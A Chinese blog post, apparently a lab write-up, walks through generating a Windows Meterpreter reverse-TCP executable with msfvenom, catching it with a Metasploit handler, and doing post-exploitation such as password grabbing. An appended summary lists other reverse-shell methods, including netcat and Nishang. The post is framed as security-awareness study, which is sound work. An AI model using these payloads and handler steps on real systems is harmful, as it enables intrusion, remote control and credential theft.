利用windows恶意软件获取windows主机shell

  • 实验目的:
    • 模拟黑客利用windows恶意软件获取windows主机shell权限的过程
    • 熟悉操作使用的命令
  • 实验准备:
    • kali
    • 同网段的windows主机(关闭防火墙)
    • msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。
  • 实验内容:
    • 制作Windows恶意软件获取shell \
    • msfvenom的shell在windows中的使用
    • msfvenom生成shell.exe
  • 实验步骤
    • 制造恶意程序文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.24.131 LPORT=6060 -f exe

    • 出现载荷与exe文件大小表示成功了
    • 切换到相应界面,查看exe文件

    • 回到kali命令窗口
    • 进入msf控制台 :msfconsole

    • 使用侦听模块设置侦听(加载模块,设置载荷和参数)
      • use exploit/multi/handler
      • set payload windows/meterpreter/reverse_tcp
      • set lhost 192.168.24.131
      • set lport 6060
    • 如图

    • exploit 运行

    • 将之前生成exe运行文件拷贝到win7系统中,并运行

    • 返回kali发现程序的运行已经被监控到,如图

    • 通过meterpreter进行后渗透操作,例如获取密码

    • 获取shell

    • 打开百度以及弹出计算器

    • 效果如图

  • 记录网络安全学习过程,希望能提高大家的安全意识。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Windows系统中,反弹shell是一种常见的攻击技术,用于获取对目标机器的远程访问权限。有几种常见的方法可以实现Windows反弹shell。 一种方法是使用Metasploit框架。首先,使用msfvenom生成一个powershell类型的木马,然后开启监听端口。目标机在命令提示符下执行生成的powershell脚本,即可实现反弹shell。需要注意的是,有时由于防火墙的原因,控制可能会不稳定。\[1\] 另一种方法是使用nc(netcat)工具进行反弹。通过nc反弹得到的shell可能不是一个完全交互的shell,某些命令可能无效。相比之下,通过Python脚本得到的shell可以实现对被控制主机的任意操作。\[2\] 此外,还有一些基于PowerShell攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit框架、nc工具以及基于PowerShell攻击框架。具体选择哪种方法取决于实际需求和环境。 #### 引用[.reference_title] - *1* *2* [Windows下反弹shell的方式](https://blog.csdn.net/ws1813004226/article/details/117248359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [Windows下反弹shell的方法](https://blog.csdn.net/qq_39101049/article/details/96191861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值